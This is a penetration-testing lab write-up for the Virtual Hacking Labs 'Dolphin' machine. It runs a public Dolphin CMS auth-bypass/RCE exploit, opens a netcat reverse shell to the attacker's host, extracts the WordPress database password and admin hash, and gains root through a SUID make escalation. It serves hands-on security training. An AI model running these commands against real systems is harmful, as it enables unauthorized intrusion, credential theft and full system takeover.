xsspresso
xsspresso
WriteupsVHL — Dolphin
WebMediumLinux

VHL — Dolphin

Dolphin CMS with a WordPress instance on port 81. Admin credential brute-force leads to plugin RCE and privilege escalation.

February 12, 2025Virtual Hacking Labs
#Dolphin CMS#WordPress#Brute Force#RCE

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 15:53 EST
Nmap scan report for 10.11.1.58
Host is up (0.022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ed:5d:8e:e9:c3:17:74:b3:e8:ee:a4:f1:b8:e3:47:6d (RSA)
|   256 99:02:13:1e:71:99:d1:32:23:20:e2:fb:bb:65:5f:b7 (ECDSA)
|_  256 75:2c:60:32:65:f9:bd:7c:5b:72:06:97:84:f7:20:a3 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Dolphin CMS
|_http-server-header: Apache/2.4.41 (Ubuntu)
81/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dolphin
|_http-generator: WordPress 6.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/12%OT=21%CT=1%CU=33154%PV=Y%DS=2%DC=I%G=Y%TM=67AD
OS:0A78%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(S
OS:P=105%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=107%TI=Z%II=I%TS
OS:=A)SEQ(SP=106%GCD=2%ISR=107%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST1
OS:1NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)
 
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT      ADDRESS
1   22.11 ms 10.11.1.58
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.63 seconds

21

sh
21/tcp open  ftp     ProFTPD
sh
ftp anonymous@10.11.1.58
Connected to 10.11.1.58.
220 ProFTPD Server (Debian) [::ffff:10.11.1.58]
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
sh
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.58
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-12 15:55:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.58:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-12 15:55:33

80

sh
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Dolphin CMS
|_http-server-header: Apache/2.4.41 (Ubuntu)

81

sh
81/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dolphin
|_http-generator: WordPress 6.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

BoonEx Dolphin

Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution

  • https://www.exploit-db.com/exploits/40756
sh
 python2 40756.py http://10.11.1.58/ 
[+] Dolphin <= 7.3.2 Auth bypass / RCE exploit
[+] Author : Ahmed sultan (0x4148)
[+] Home : 0x4148.com
 
 + Sending payload to 10.11.1.58
 * Checking if payload was send
 + php prompt up and running
 + type 'shell' to get shell access
 
php>> shell 
 
 + Switched to Shell mode
 + Type 'return' to return to php prompt mode
 
0x4148@10.11.1.58# whoami
www-data
sh
busybox nc 172.16.1.1 1234 -e bash
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.58] 45226
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@dolphin:/var/www/html/tmp$ whoami
whoami
www-data
sh
www-data@dolphin:/$ uname -a
uname -a
Linux dolphin 5.4.0-120-generic #136-Ubuntu SMP Fri Jun 10 13:40:48 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
www-data@dolphin:/$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

wp-config.php

php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
 
/** Database username */
define( 'DB_USER', 'wordpress' );
 
/** Database password */
define( 'DB_PASSWORD', 'P4aSsVV0rD!3' );
 
/** Database hostname */
define( 'DB_HOST', 'localhost' );
sh
www-data@dolphin:/var/www/html/wordpress$ mysql -u 'wordpress' -p'P4aSsVV0rD!3'
sh
mysql> use wordpress
sh
mysql> select * from wp_users;
select * from wp_users;
+----+---------------+------------------------------------+---------------+-------------------------+-------------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email              | user_url                | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+-------------------------+-------------------------+---------------------+---------------------+-------------+---------------+
|  1 | administrator | $P$BI2TXgSf/gAL69uUCkj02PbsmSNKIV/ | administrator | dolphin@localhost.local | http://192.168.6.176:81 | 2022-06-17 14:49:10 |                     |           0 | administrator |
+----+---------------+------------------------------------+---------------+-------------------------+-------------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)

priv esc

linpeas

sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
 
-rwsr-xr-x 1 root root 226K Jul 28  2018 /usr/bin/make

SUID (make)

  • https://gtfobins.github.io/gtfobins/make/#suid
sh
COMMAND='/bin/bash -p'
/usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
sh
www-data@dolphin:/tmp$ COMMAND='/bin/bash -p'
COMMAND='/bin/bash -p'
www-data@dolphin:/tmp$ /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
/usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
bash-5.0# whoami
whoami
root
bash-5.0# cat /root/key.txt
cat /root/key.txt
hjf9dhjd31djasd328rh
bash-5.0# date
date
Wed Feb 12 21:45:48 UTC 2025

Up next

MediumFeb 2025

VHL — Fed

Custom PHP forum on Fedora Linux with MariaDB. SQL injection bypasses authentication, leading to file write and shell upload.

Read writeup
MediumFeb 2025

VHL — Mantis

MantisBT bug tracker with Samba shares on Ubuntu. Enumeration of SMB reveals credentials reused for MantisBT admin access.

Read writeup
EasyFeb 2025

VHL — Natural

FTP anonymous login exposes web application files. Abused file write via FTP to upload a PHP webshell for initial access.

Read writeup